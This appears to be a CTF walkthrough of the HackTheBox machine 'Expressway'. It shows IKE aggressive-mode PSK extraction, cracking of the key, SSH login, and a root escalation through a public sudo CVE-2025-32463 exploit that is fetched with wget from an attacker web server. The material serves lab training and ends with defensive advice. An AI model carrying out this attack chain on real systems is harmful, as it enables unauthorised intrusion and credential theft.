Back to Writeups

HTB Expressway Walkthrough

IKE/IPSec Exploitation & Sudo Chroot Privilege Escalation

Published: October 3, 2025 Difficulty: Medium

Expressway is a HackTheBox machine that demonstrates VPN security vulnerabilities through IKE/IPSec aggressive mode exploitation and Pre-Shared Key (PSK) cracking. This machine teaches network protocol analysis, VPN security assessment, and exploiting CVE-2025-32463 in sudo for privilege escalation.

Reconnaissance Phase

TCP Port Scanning

Objective: Discover open TCP ports and identify SSH authentication methods.

Perform a targeted scan on SSH with authentication method enumeration:

sudo nmap -p22 -sV --script ssh-auth-methods <TARGET_IP>

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Key Findings:

  • SSH service running OpenSSH 10.0p2
  • Both publickey and password authentication enabled
  • Debian 8 Linux system

Key Learnings:

SSH authentication method enumeration helps identify available attack vectors. Both password and key-based authentication being enabled provides multiple potential entry points.

UDP Port Scanning

Objective: Discover UDP services, particularly VPN-related protocols.

Scan the top 15 UDP ports:

sudo nmap -sU -sV --top-ports 15 <TARGET_IP> -v

Discovery:

Discovered open port 500/udp on <TARGET_IP>

Port 500/UDP is used by IKE (Internet Key Exchange), which is the foundation of IPSec VPN connections.

IKE Version Detection:

sudo nmap -sU -p 500 --script ike-version <TARGET_IP>

Results:

PORT    STATE SERVICE
500/udp open  isakmp
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0

Key Findings:

  • IKE/ISAKMP service on UDP port 500
  • XAUTH (Extended Authentication) supported
  • Dead Peer Detection v1.0 enabled

Key Learnings:

UDP scanning is essential for discovering VPN and tunneling services. Port 500 is standard for IKE, which negotiates IPSec VPN connections.

IKE/IPSec Enumeration

IKE Aggressive Mode Scanning

Objective: Enumerate IKE aggressive mode to extract PSK hash for cracking.

Understanding IKE Modes:

  • Main Mode: More secure but slower (6 messages)
  • Aggressive Mode: Faster but exposes PSK hash (3 messages)

Aggressive mode is vulnerable because it sends the PSK hash in plaintext, allowing offline brute force attacks.

Initial Aggressive Mode Scan:

sudo ike-scan -A -M <TARGET_IP>

Results:

10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=531bd2eace1c7d31)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Critical Discovery:

VPN User ID: ike@expressway.htb

Encryption Details:

  • Encryption: 3DES
  • Hash: SHA1
  • DH Group: Group 2 (modp1024)
  • Authentication: PSK (Pre-Shared Key)
  • Lifetime: 28800 seconds (8 hours)

Key Learnings:

IKE aggressive mode leaks sensitive information including user identities and allows PSK hash extraction. This is a significant security vulnerability in VPN configurations.

PSK Hash Extraction

Objective: Extract the PSK hash in a format suitable for offline cracking.

Use the discovered user ID to extract PSK parameters:

sudo ike-scan -A -M -P --id=ike@expressway.htb <TARGET_IP>

Command explanation:

  • -A: Use aggressive mode
  • -M: Split transform sets
  • -P: Output PSK parameters for cracking
  • --id: Specify the VPN user ID

Results:

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=13bad56708b6f725)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
8c3d18d9b709f348d25b286d6563acc98a65cd386722773a27eccc418ec0c7d3318617398a8f04ad92fb48fcb9490bc2ea03dfa3aaecc378c3ac8e99da12eb54e63f36b922362a993b4f6487355bfd61000b3f2b842ecdc799e57aa2b362a2f4e5e023c0d20ad33f3007cb1dd6cfa35b2d3a8afa12c6f5b5154a3a9a38c60857:cee9578143b99a88fef49e086e73ef9e35317abedcc664f9bc26842b33ea70af4c6dd92a56037787a6ee49bc1a7517d2da46061679bbac717a5e4ab0e408229782b0d5c19f47bea2fd9d1d5c88bb80eb96ecf0c7c58de4d3afed05e9dbbb8b423b3013479e1508ee1681abff2b4e9e3a46a623b09ebc1f9f5e92ecf24e8aa3c2:13bad56708b6f725:0a5b5e672081dacf:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:048481af1437ae18b3a9a07893185480e1354afd:25ed6e5c8609307d34d1b72e98ec655e188d85be1183f4e113c3164e49adc516:443628570f8d2410f7fb0325b34a44f3f4ac2117

Save PSK Hash:

Create a file to store the PSK parameters:

sudo nano psk-hash.txt

Paste the entire PSK parameter string (the long colon-separated hash from the output).

Key Learnings:

The PSK parameters contain all necessary cryptographic material to perform offline dictionary attacks against the Pre-Shared Key. This data includes Diffie-Hellman exchanges, cookies, nonces, and the hash to crack.

Pre-Shared Key Cracking

Dictionary Attack on PSK

Objective: Crack the Pre-Shared Key using dictionary attacks.

Use psk-crack (part of ike-scan package) to crack the PSK:

psk-crack -d /usr/share/wordlists/rockyou.txt psk-hash.txt

Command explanation:

  • -d: Dictionary file to use (rockyou.txt)
  • psk-hash.txt: File containing PSK parameters

Cracking output:

Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 0bcb9a8e9c95bb108ca3b0dd3866c9c9156fd6ea
Ending psk-crack: 8045040 iterations in 5.276 seconds (1524824.57 iterations/sec)
Cracked PSK: freakingrockstarontheroad

Alternative Cracking Tools:

# Using hashcat (mode 5300 for IKE PSK MD5)
hashcat -m 5300 -a 0 psk-hash.txt /usr/share/wordlists/rockyou.txt

# Using John the Ripper
# Convert to john format first
john --wordlist=/usr/share/wordlists/rockyou.txt psk-hash.txt

Key Learnings:

Weak Pre-Shared Keys in VPN configurations are vulnerable to dictionary attacks. Organizations should use strong, random PSKs and avoid aggressive mode when possible.

SSH Access with Cracked Credentials

Objective: Use the discovered username and cracked password for SSH authentication.

Compile discovered credentials:

Username: ike (from ike@expressway.htb)
Password: freakingrockstarontheroad

Connect via SSH:

ssh ike@<TARGET_IP>

Enter password when prompted: freakingrockstarontheroad

Initial Enumeration:

# Check current user and privileges
whoami
id

# List home directory
ls -la

# Check for user flag
cat user.txt
🚩 User Flag: 72ca3e6bb548d8f5b4b473a9a1a3790c

Key Learnings:

VPN credentials often match system login credentials. Organizations frequently reuse PSKs as system passwords, creating multiple attack vectors from a single compromised secret.

Privilege Escalation to Root

System Enumeration with LinPEAS

Objective: Perform automated privilege escalation enumeration.

Upload and run LinPEAS for comprehensive system enumeration:

Download LinPEAS:

# On your attacking machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

# Start a web server
python3 -m http.server 8000

On Target Machine:

# Download LinPEAS
wget http://YOUR_IP:8000/linpeas.sh

# Make executable
chmod +x linpeas.sh

# Run LinPEAS
./linpeas.sh

LinPEAS identifies potential privilege escalation vectors including vulnerable sudo versions.

Key Learnings:

Automated enumeration tools like LinPEAS save time and often identify vulnerabilities that manual checks might miss. They should be part of every privilege escalation workflow.

CVE-2025-32463: Sudo Chroot Vulnerability

Objective: Exploit the sudo chroot vulnerability to achieve root access.

Vulnerability Details:

  • CVE: CVE-2025-32463
  • Affected Component: sudo chroot functionality
  • Affected Versions: sudo 1.9.17 and earlier
  • Impact: Local privilege escalation to root

References:

Vulnerability Explanation:

The vulnerability exists in how sudo handles chroot environments. When certain conditions are met, an attacker can escape the chroot jail and execute commands with elevated privileges, leading to full root access.

Key Learnings:

Sudo vulnerabilities are particularly dangerous because sudo is installed on nearly every Linux system and is frequently used for privilege elevation. Keeping sudo updated is critical for system security.

Exploit Deployment and Execution

Objective: Deploy and execute the CVE-2025-32463 exploit.

Step 1: Download Exploit

# On attacking machine
git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot
cd CVE-2025-32463_chwoot

# Start web server
python3 -m http.server 8000

Step 2: Transfer to Target

# On target machine
cd /tmp
wget http://YOUR_IP:8000/exploit.sh

# Or if you copied the code directly
nano exploit.sh
# Paste the exploit code

Step 3: Make Executable

chmod 766 exploit.sh

The 766 permissions give:

  • Owner: read, write, execute (7)
  • Group: read, write (6)
  • Others: read, write (6)

Step 4: Execute Exploit

./exploit.sh

The exploit should successfully escalate privileges to root.

Verify Root Access:

whoami
id

Output should confirm root privileges.

Key Learnings:

Public exploits are readily available for known CVEs. Organizations must patch critical vulnerabilities quickly to prevent exploitation with publicly available tools.

Root Flag Retrieval

Objective: Retrieve the root flag and complete the challenge.

Navigate to root directory and read the flag:

cat /root/root.txt
🚩 Root Flag: ba620c13e51a134a10db4a468393578b

Post-Exploitation Activities:

# View root directory contents
ls -la /root/

# Check sudo version
sudo --version

# View system information
uname -a
cat /etc/os-release

# Check for other users
cat /etc/passwd | grep -v nologin

# View command history
cat /root/.bash_history

# Check cron jobs
crontab -l
ls -la /etc/cron*

Key Learnings:

Root access provides complete system control. In real penetration tests, this stage would involve documenting all findings, collecting evidence, and preparing the final report.

Challenge Summary

Complete Attack Chain

Full Exploitation Path:

  1. TCP Reconnaissance: Discovered SSH service with multiple authentication methods
  2. UDP Scanning: Identified IKE/IPSec service on port 500
  3. IKE Enumeration: Discovered aggressive mode enabled with user identity leak
  4. PSK Extraction: Captured Pre-Shared Key hash using ike-scan
  5. Credential Cracking: Successfully cracked PSK using dictionary attack
  6. SSH Access: Used cracked credentials to authenticate via SSH
  7. System Enumeration: Ran LinPEAS to identify privilege escalation vectors
  8. Sudo Exploitation: Exploited CVE-2025-32463 for root access

Flags Captured:

🚩 User Flag: 72ca3e6bb548d8f5b4b473a9a1a3790c
🚩 Root Flag: ba620c13e51a134a10db4a468393578b

Technical Skills Demonstrated:

  • TCP and UDP port scanning with Nmap
  • VPN protocol enumeration (IKE/IPSec)
  • IKE aggressive mode exploitation
  • Pre-Shared Key extraction and analysis
  • PSK cracking using dictionary attacks
  • SSH authentication and enumeration
  • Automated privilege escalation enumeration (LinPEAS)
  • CVE research and exploitation
  • Sudo vulnerability exploitation

Vulnerabilities Identified:

  • IKE Aggressive Mode: Exposes PSK hash for offline cracking
  • Weak Pre-Shared Key: Found in common wordlists
  • Credential Reuse: VPN PSK used as system password
  • CVE-2025-32463: Sudo chroot privilege escalation
  • Outdated Software: Vulnerable sudo version not patched

Defensive Recommendations:

  • Disable IKE Aggressive Mode: Use Main Mode for better security
  • Strong PSK Generation: Use long, random Pre-Shared Keys
  • Certificate-Based Authentication: Prefer certificates over PSKs
  • Avoid Credential Reuse: Never reuse VPN PSKs as system passwords
  • Regular Patching: Keep sudo and all system packages updated
  • Network Segmentation: Isolate VPN services from critical systems
  • Monitoring: Log and alert on VPN authentication attempts
  • Password Policy: Enforce strong password requirements

Tools and Techniques Used:

  • Nmap: TCP/UDP scanning and service detection
  • ike-scan: IKE aggressive mode enumeration and PSK extraction
  • psk-crack: Pre-Shared Key dictionary attacks
  • SSH: Remote system access
  • LinPEAS: Automated privilege escalation enumeration
  • CVE Exploit: Public sudo vulnerability exploit

Real-World Implications:

  • VPN misconfigurations are common in enterprise environments
  • IKE aggressive mode is still widely used despite security risks
  • Weak Pre-Shared Keys compromise entire VPN infrastructure
  • Credential reuse multiplies the impact of single compromises
  • Sudo vulnerabilities affect millions of Linux systems
  • Timely patching is critical for preventing exploitation

VPN Security Best Practices:

  • Always use IKE Main Mode instead of Aggressive Mode
  • Implement certificate-based authentication (X.509)
  • Use Perfect Forward Secrecy (PFS)
  • Regularly rotate Pre-Shared Keys
  • Monitor VPN logs for suspicious activity
  • Implement multi-factor authentication
  • Use strong encryption algorithms (AES-256, SHA-256+)
  • Avoid weak Diffie-Hellman groups (use Group 14+)